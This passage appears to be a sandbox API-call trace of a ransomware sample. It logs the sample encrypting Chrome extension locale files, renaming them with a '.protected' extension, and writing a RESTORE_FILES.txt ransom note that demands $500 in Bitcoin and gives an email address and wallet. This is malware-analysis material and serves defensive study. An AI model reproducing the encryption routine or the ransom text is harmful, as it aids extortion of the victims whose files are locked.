(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json") returned 155 [0080.160] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.160] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json") returned 155 [0080.160] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.160] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0080.161] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.161] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0080.161] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.161] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.161] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.161] CloseHandle (hObject=0x168) returned 1 [0080.161] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.protected") returned 165 [0080.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.protected")) returned 1 [0080.162] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.162] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.162] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0080.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.162] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.162] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.163] lstrlenA (lpString="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") returned 684 [0080.163] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.163] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.163] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.163] CloseHandle (hObject=0x164) returned 1 [0080.163] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0080.163] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0080.163] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk") returned 141 [0080.163] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0080.163] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0080.163] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\*") returned 143 [0080.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.164] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.164] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.164] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.164] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.164] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.164] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\.") returned 143 [0080.164] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.164] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.164] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.164] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.164] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.164] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.164] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.164] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\..") returned 144 [0080.164] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.164] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.164] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.164] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.164] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.164] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.164] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.164] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.164] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json") returned 155 [0080.164] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.164] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.164] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.164] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.165] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json") returned 155 [0080.165] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.165] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json") returned 155 [0080.165] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.165] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json") returned 155 [0080.165] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.165] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdb, lpOverlapped=0x0) returned 1 [0080.166] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.166] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdb, lpOverlapped=0x0) returned 1 [0080.166] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.166] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.166] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.166] CloseHandle (hObject=0x168) returned 1 [0080.166] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.protected") returned 165 [0080.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json.protected")) returned 1 [0080.167] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.167] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.167] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0080.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.167] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.167] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.168] lstrlenA (lpString="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") returned 684 [0080.168] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.168] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.168] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.168] CloseHandle (hObject=0x164) returned 1 [0080.168] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0080.168] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0080.168] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl") returned 141 [0080.168] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0080.168] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0080.168] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\*") returned 143 [0080.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.168] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0080.168] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.168] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.169] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.169] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.169] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\.") returned 143 [0080.169] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.169] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.169] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.169] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.169] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.169] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.169] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.169] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\..") returned 144 [0080.169] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.169] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.169] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.169] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.169] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.169] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0080.169] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.169] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.169] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json") returned 155 [0080.169] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.169] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.169] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.169] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.169] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json") returned 155 [0080.169] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.169] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json") returned 155 [0080.169] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.169] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json") returned 155 [0080.169] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.169] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0080.170] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.170] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0080.170] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.170] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.170] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.171] CloseHandle (hObject=0x168) returned 1 [0080.171] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
